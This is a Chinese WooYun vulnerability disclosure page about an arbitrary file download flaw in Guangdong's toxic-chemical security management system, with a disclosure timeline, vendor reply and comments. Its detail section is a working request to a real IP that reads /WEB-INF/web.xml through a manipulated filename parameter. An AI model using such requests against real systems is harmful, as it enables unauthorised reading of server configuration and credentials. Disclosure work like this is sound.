漏洞概要
关注数(24)
关注此漏洞
漏洞标题:广东省剧毒化学品治安管理信息系统任意文件下载漏洞
漏洞作者: 网监
提交时间:2013-05-07 16:34
修复时间:2013-06-21 16:34
公开时间:2013-06-21 16:34
漏洞类型:网络敏感信息泄漏
危害等级:低
自评Rank:1
漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理
Tags标签:
无
漏洞详情
披露状态:
2013-05-07: 细节已通知厂商并且等待厂商处理中
2013-05-09: 厂商已经确认,细节仅向厂商公开
2013-05-19: 细节向核心白帽子及相关领域专家公开
2013-05-29: 细节向普通白帽子公开
2013-06-08: 细节向实习白帽子公开
2013-06-21: 细节向公众公开
简要描述:
剧毒化学品治安管理信息系统任意文件下载漏洞
详细说明:
http://61.144.19.121:5600/down/detailLocalFile.jsp?filename=/WEB-INF/web.xml&name=%D7%E9%D6%AF%BB%FA%B9%B9%B4%FA%C2%EB%D6%A4.jpg&A83C69FBA585B0CA06ADBAA19CC43EF36=CpnvRLGdHjTqQY7mypL8RWTBLy7DC8cvQ0NvTSfYfmLvLdqWyPZ8!-213033169!1367868989698
。。。以下省略
漏洞证明:
修复方案:
版权声明:转载请注明来源 网监@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:3
确认时间:2013-05-09 12:37
厂商回复:
感谢您的支持,欢迎继续测试
最新状态:
暂无
漏洞评价:
评论
-
2013-05-07 16:34 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2013-05-11 11:42 |
网监 ( 实习白帽子 | Rank:33 漏洞数:2 | 北京市公安局网络安全保卫大队)
-
2014-01-28 17:18 |
Stranger ( 路人 | Rank:0 漏洞数:1 | 我注意你很久了.....)
-
2014-01-28 18:12 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)
@Stranger 漏洞状态: 已交由第三方厂商(广东省信息安全测评中心)处理。 rank给的似乎没有cert多
-
2014-01-28 18:17 |
Stranger ( 路人 | Rank:0 漏洞数:1 | 我注意你很久了.....)
@wefgod 原来是这样,看来第三方很尊重帽子们的辛劳....
-
2014-01-29 11:15 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)